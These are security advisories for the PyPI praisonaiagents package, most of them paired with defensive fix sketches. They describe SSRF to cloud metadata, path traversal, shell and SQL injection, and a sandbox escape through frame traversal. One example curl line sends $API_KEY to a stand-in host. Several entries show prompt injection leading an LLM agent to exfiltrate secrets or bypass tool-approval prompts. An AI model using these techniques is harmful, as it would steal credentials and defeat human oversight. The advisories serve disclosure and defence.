Advisories for the PyPI `praisonaiagents` package

2026

PraisonAI: SQL Injection via unvalidated `table_prefix` in 9 conversation store backends (incomplete fix for CVE-2026-40315)

The fix for CVE-2026-40315 added input validation to SQLiteConversationStore only. Nine sibling backends (MySQL, PostgreSQL, async SQLite/MySQL/PostgreSQL, Turso, SingleStore, Supabase, SurrealDB) still pass `table_prefix` straight into f-string SQL: same root cause, same code pattern, same exploitation, across 52 unvalidated injection points in the codebase. postgres.py additionally accepts an unvalidated `schema` parameter used directly in DDL.

PraisonAIAgents: SSRF via unvalidated URL in `web_crawl` httpx fallback

The httpx fallback path in `web_crawl` passes user-supplied URLs directly to `httpx.AsyncClient.get()` with `follow_redirects=True` and no host validation. An LLM agent tricked into crawling an internal URL can reach cloud metadata endpoints (169.254.169.254), internal services, and localhost, and the response content is returned to the agent, where it may appear in output visible to the attacker. This fallback is the default crawl path on a fresh PraisonAI installation (no Tavily key, no Crawl4AI installed).
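A sketch of the missing host check, assuming a guard run before each fetch. The function name is hypothetical; note that with `follow_redirects=True` the check must also be repeated on every redirect target, since a public host can bounce to an internal one.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_crawl_url(url: str) -> bool:
    """Reject URLs whose host resolves to loopback, private, or
    link-local ranges (e.g. the 169.254.169.254 metadata endpoint).
    Illustrative guard, not the library's actual code."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        addr = ipaddress.ip_address(info[4][0])
        if not addr.is_global:  # covers loopback, RFC 1918, link-local
            return False
    return True
```

Resolving the hostname first (rather than string-matching the URL) also catches DNS names that point at internal addresses.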

PraisonAIAgents: Path Traversal via Unvalidated Glob Pattern in list_files Bypasses Workspace Boundary

The `list_files()` tool in FileTools validates the `directory` parameter against workspace boundaries via `_validate_path()`, but passes the `pattern` parameter directly to `Path.glob()` without any validation. Because Python's `Path.glob()` matches `..` path segments literally, an attacker can use relative path traversal in the glob pattern to enumerate arbitrary files outside the workspace, obtaining file metadata (existence, name, size, timestamps) for any path on the filesystem.
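One way to close the gap, sketched under the assumption that the tool can post-filter glob results (names here are illustrative): resolve every match and discard anything that escapes the workspace root.

```python
from pathlib import Path

def safe_glob(workspace, pattern):
    """Glob within a workspace, discarding any match whose resolved
    path lies outside the workspace root. This neutralizes patterns
    like '../../etc/*' that walk out via literal '..' segments."""
    ws = Path(workspace).resolve()
    out = []
    for p in ws.glob(pattern):
        r = p.resolve()
        if r == ws or ws in r.parents:
            out.append(r)
    return out
```

Filtering the results (rather than the pattern string) is robust against encodings and symlinks that a pattern blocklist would miss.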

PraisonAIAgents: Environment Variable Secret Exfiltration via os.path.expandvars() Bypassing shell=False in Shell Tool

The `execute_command` function in shell_tools.py calls `os.path.expandvars()` on every command argument at line 64, manually re-implementing shell-level environment variable expansion despite using `shell=False` (line 88) for security. This allows exfiltration of secrets stored in environment variables (database credentials, API keys, cloud access keys). The approval system displays the unexpanded `$VAR` references to human reviewers, creating a deceptive approval flow in which the displayed command differs from what actually executes.
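The core primitive is easy to demonstrate in plain Python: `os.path.expandvars()` substitutes `$VAR` references from the process environment even though no shell is involved, so `shell=False` alone offers no protection. The helper below is a hypothetical mirror of the described pattern, not the library's actual code.

```python
import os

def expand_args_like_vulnerable_tool(args):
    # Hypothetical mirror of the pattern described in the advisory:
    # expanding $VAR in each argument reintroduces shell-style
    # environment expansion that shell=False was meant to avoid.
    return [os.path.expandvars(a) for a in args]
```

A reviewer approving `curl http://example.test/?k=$API_KEY` sees the literal `$API_KEY`, while the expanded secret is what actually reaches the subprocess argv.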

PraisonAIAgents: Arbitrary File Read via read_skill_file Missing Workspace Boundary and Approval Gate

`read_skill_file()` in skill_tools.py allows reading arbitrary files from the filesystem by accepting an unrestricted `skill_path` parameter. Unlike `file_tools.read_file`, which enforces workspace-boundary confinement, and unlike `run_skill_script`, which requires critical-level approval, `read_skill_file` has neither protection. An agent influenced by prompt injection can exfiltrate sensitive files without triggering any approval prompt.
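A sketch of the missing confinement check, assuming the same resolve-then-compare approach the advisory attributes to `file_tools.read_file`. Function and parameter names are illustrative.

```python
from pathlib import Path

def read_skill_file_confined(workspace, skill_path):
    """Resolve the requested path and refuse anything that escapes
    the workspace root, including paths using '..' or symlinks.
    Illustrative guard, not the library's actual implementation."""
    ws = Path(workspace).resolve()
    target = (ws / skill_path).resolve()
    if target != ws and ws not in target.parents:
        raise PermissionError(f"path escapes workspace: {skill_path}")
    return target.read_text()
```

Resolving before comparing is the important step: a prefix check on the raw string would still be bypassable via `..` segments and symlinks.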

PraisonAIAgents has SSRF and Local File Read via Unvalidated URLs in web_crawl Tool

The `web_crawl()` function in praisonaiagents/tools/web_crawl_tools.py accepts arbitrary URLs from AI agents with zero validation: no scheme allowlisting, hostname/IP blocklisting, or private-network checks are applied before fetching. This allows an attacker (or prompt injection in crawled content) to force the agent to fetch cloud metadata endpoints, internal services, or local files via `file://` URLs.
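The `file://` variant is stopped by the simplest of the missing checks, a scheme allowlist applied before any fetch. This is a minimal sketch (host/IP filtering is a separate, additional requirement); the function name is illustrative.

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def check_scheme(url: str) -> str:
    """Reject file://, ftp://, gopher:// and any other non-HTTP
    scheme before the crawler touches the URL."""
    scheme = urlparse(url).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"blocked URL scheme: {scheme or '(none)'}")
    return url
```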

PraisonAIAgents has an OS Command Injection via shell=True in Memory Hooks Executor (memory/hooks.py)

The memory hooks executor in praisonaiagents passes a user-controlled command string directly to `subprocess.run()` with `shell=True` at src/praisonai-agents/praisonaiagents/memory/hooks.py lines 303 to 305. No sanitization, no `shlex.quote()`, no character filter, and no allowlist check exists anywhere in this file. Shell metacharacters including semicolons, pipes, ampersands, backticks, dollar-sign substitutions, and newlines are interpreted by /bin/sh before the intended command executes. Two independent attack surfaces exist. The first is via `pre_run_command` and …
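The standard remediation for this class of bug is to split the configured command with `shlex` and execute it without a shell, so metacharacters reach the program as literal argument text instead of being interpreted by /bin/sh. A sketch (the function name is illustrative):

```python
import shlex
import subprocess

def run_hook_safe(command: str):
    """Execute a hook command without a shell: ';', '|', '$()',
    backticks and newlines are passed through as literal argv
    content rather than interpreted by /bin/sh."""
    argv = shlex.split(command)
    return subprocess.run(argv, capture_output=True, text=True, check=False)
```

With this pattern, an injected `; rm -rf /tmp/x` suffix becomes inert text handed to the first program rather than a second command.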

PraisonAI: Cross-Origin Agent Execution via Hardcoded Wildcard CORS and Missing Authentication on AGUI Endpoint

The AGUI endpoint (`POST /agui`) has no authentication and hardcodes `Access-Control-Allow-Origin: *` on all responses. Combined with Starlette/FastAPI's Content-Type-agnostic JSON parsing, any website a victim visits can silently trigger arbitrary agent execution against a locally running AGUI server and read the full response, including tool execution results and potentially sensitive data from the victim's environment.
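The CORS half of the fix can be sketched framework-independently: echo back only explicitly allowed origins instead of hardcoding `*`. Note this only stops the browser from reading the response; authentication is still required separately, since the request itself executes regardless of CORS. Names below are illustrative.

```python
def cors_headers(request_origin, allowed_origins):
    """Return CORS headers only for an allowlisted Origin; anything
    else (including a missing Origin) gets no CORS grant at all."""
    if request_origin is not None and request_origin in allowed_origins:
        return {
            "Access-Control-Allow-Origin": request_origin,
            "Vary": "Origin",  # responses differ per Origin; keep caches honest
        }
    return {}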

PraisonAI: Coarse-Grained Tool Approval Cache Bypasses Per-Invocation Consent for Shell Commands

The approval system in PraisonAI Agents caches tool approval decisions by tool name only, not by invocation arguments. Once a user approves `execute_command` for any command (e.g., `ls -la`), all subsequent `execute_command` calls in that execution context bypass the approval prompt entirely. Combined with `os.environ.copy()` passing all process environment variables to subprocesses, this allows an LLM agent (potentially via prompt injection) to silently exfiltrate API keys and credentials without further …
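A sketch of a finer-grained cache key, assuming approvals are stored in a dict keyed per decision (the helper name and structure are illustrative): keying on the tool name plus a canonical hash of the arguments means approving `ls -la` no longer also approves every later `execute_command` invocation.

```python
import hashlib
import json

def approval_cache_key(tool_name, kwargs):
    """Key approval decisions on (tool, canonicalized arguments)
    rather than tool name alone, so each distinct invocation is
    prompted for separately."""
    canon = json.dumps(kwargs, sort_keys=True, separators=(",", ":"))
    return (tool_name, hashlib.sha256(canon.encode()).hexdigest())
```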

PraisonAI Vulnerable to RCE via Automatic tools.py Import

PraisonAI automatically imports `./tools.py` from the current working directory when launching certain components, including call.py, tool_resolver.py, and CLI tool-loading paths. A malicious tools.py placed in the process working directory is executed immediately on import, allowing arbitrary Python code execution in the host environment.
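Why this is equivalent to code execution: importing a Python module runs its top-level statements. The generic loader below (not PraisonAI's actual loader) demonstrates that merely loading a tools.py file executes whatever it contains.

```python
import importlib.util

def load_tools_module(path):
    """Load a Python file as a module. Any top-level code in the
    file runs at this point, which is why auto-importing ./tools.py
    from an untrusted working directory is dangerous."""
    spec = importlib.util.spec_from_file_location("tools_demo", path)
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)  # side effects execute here
    return mod
```

The usual mitigations are to load tools only from an explicitly configured, trusted path, or to require an opt-in flag before importing from the CWD.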

PraisonAI has critical RCE via `type: job` workflow YAML

`praisonai workflow run <file.yaml>` loads untrusted YAML and, if `type: job`, executes steps through JobWorkflowExecutor in job_workflow.py. Supported step keys:

run: → shell command execution via subprocess.run()
script: → inline Python execution via exec()
python: → arbitrary Python script execution

A malicious YAML file can therefore execute arbitrary host commands.
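One defensive shape, sketched over an already-parsed workflow dict (key names follow the advisory; the real schema may differ): refuse executable step keys in job-type workflows unless the caller explicitly opts in.

```python
DANGEROUS_STEP_KEYS = {"run", "script", "python"}

def assert_workflow_safe(workflow: dict, allow_execution: bool = False):
    """Guard for untrusted workflow files: reject job workflows
    containing executable step keys unless explicitly permitted."""
    if workflow.get("type") != "job" or allow_execution:
        return workflow
    for step in workflow.get("steps", []):
        bad = DANGEROUS_STEP_KEYS & set(step)
        if bad:
            raise PermissionError(
                f"executable step keys in untrusted workflow: {sorted(bad)}"
            )
    return workflow
```

Running such a check after `yaml.safe_load()` but before JobWorkflowExecutor sees the document keeps the trust decision with the operator rather than the file author.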

PraisonAI Browser Server allows unauthenticated WebSocket clients to hijack connected extension sessions

praisonai browser start exposes the browser bridge on 0.0.0.0 by default, and its /ws endpoint accepts websocket clients that omit the Origin header entirely. An unauthenticated network client can connect as a fake controller, send start_session, cause the server to forward start_automation to another connected browser-extension websocket, and receive the resulting action/status stream back over that hijacked session. This allows unauthorized remote use of a connected browser automation session without …
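A sketch of the two missing checks as a single admission function (parameter names are illustrative): require a matching Origin header, rejecting clients that omit it entirely, and a shared secret compared in constant time.

```python
import hmac

def authorize_ws_client(origin, token, *, expected_token, allowed_origins):
    """Admit a websocket client only if it presents an allowlisted
    Origin AND a valid shared-secret token. A missing Origin is
    rejected, not treated as trusted."""
    if origin is None or origin not in allowed_origins:
        return False
    if token is None or not hmac.compare_digest(token, expected_token):
        return False
    return True
```

Binding to 127.0.0.1 instead of 0.0.0.0 by default would additionally keep the bridge off the network entirely unless the operator opts in.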

PraisonAI has sandbox escape via exception frame traversal in `execute_code` (subprocess mode)

`execute_code()` in praisonaiagents.tools.python_tools defaults to `sandbox_mode="sandbox"`, which runs user code in a subprocess wrapped with a restricted builtins dict and an AST-based blocklist. The AST blocklist embedded inside the subprocess wrapper (`blocked_attrs`, line 143 of python_tools.py) contains only 11 attribute names, a strict subset of the 30+ names blocked in the direct-execution path. The four attributes that form a frame-traversal chain out of the sandbox are all absent from …
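The traversal chain the advisory describes works in plain Python and shows which attribute names a complete blocklist must cover: catching an exception exposes `__traceback__`, whose `tb_frame` and `f_back` links walk outward to caller frames and their `f_globals`.

```python
def frames_reachable_from_exception():
    """Demonstrate the escape chain: a caught exception's traceback
    reaches the current frame, and f_back links walk out to every
    caller frame, exposing each frame's globals."""
    try:
        raise RuntimeError("probe")
    except RuntimeError as e:
        frame = e.__traceback__.tb_frame
        names = []
        while frame is not None:
            names.append(frame.f_globals.get("__name__"))
            frame = frame.f_back
        return names
```

Inside a restricted-builtins sandbox, reaching a caller's `f_globals` typically recovers an unrestricted `__builtins__`, which is why blocking only some of these four names is insufficient.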

PraisonAI has Memory State Leakage and Path Traversal in MultiAgent Context Handling

The MultiAgentLedger and MultiAgentMonitor components exhibit vulnerabilities that can lead to context leakage and arbitrary file operations:

Memory State Leakage via Agent ID Collision: MultiAgentLedger stores ledgers in a dictionary keyed by agent ID without enforcing uniqueness, so agents registered under the same ID share a ledger instance, potentially leaking sensitive context data between agents.

Path Traversal in MultiAgentMonitor: MultiAgentMonitor constructs file …
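The collision half of the issue has a one-line fix: refuse to register a second agent under an existing ID. A sketch (class and method names are illustrative, not the library's API):

```python
class UniqueLedgerRegistry:
    """Ledger store that enforces agent-ID uniqueness: a duplicate
    registration raises instead of silently handing the second agent
    the first agent's ledger."""
    def __init__(self):
        self._ledgers = {}

    def register(self, agent_id: str):
        if agent_id in self._ledgers:
            raise ValueError(f"agent id already registered: {agent_id}")
        self._ledgers[agent_id] = []  # fresh, per-agent ledger
        return self._ledgers[agent_id]
```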